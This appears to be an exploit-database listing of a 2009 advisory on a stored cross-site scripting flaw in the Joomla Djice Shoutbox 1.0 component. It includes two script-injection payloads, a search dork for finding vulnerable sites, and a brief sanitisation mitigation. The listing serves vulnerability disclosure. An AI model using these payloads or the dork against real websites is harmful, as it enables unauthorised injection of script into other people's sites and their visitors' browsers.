header-logo
Suggest Exploit
vendor:
Djice Shoutbox
by:
D3M0
6.1
CVSS
MEDIUM
Permanent XSS
79
CWE
Product Name: Djice Shoutbox
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:djiceatwork:djice_shoutbox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability

The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like: '><script>alert('XaDoS')</script> or '">><script>alert('XSS By XaDoS')</script> the XSS become permanent in every page of site! not critical damage but it's not funny..

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

############################################
#  Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability  #
############################################
 
- dork: inurl:"index.php?option=com_djiceshoutbox"
 
The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
 
"><script>alert('XaDoS')</script>
 
or

'">><script>alert('XSS By XaDoS')</script>
 
the XSS become permanent in every page of site!
not critical damage but it's not funny..
 
[+] D3M0:
 
http://www.djiceatwork.com
 
contact me at xados @ hotmail . it
www.securitycode.it

# milw0rm.com [2009-03-10]

Navigation

Suggest Exploit

Services By CQR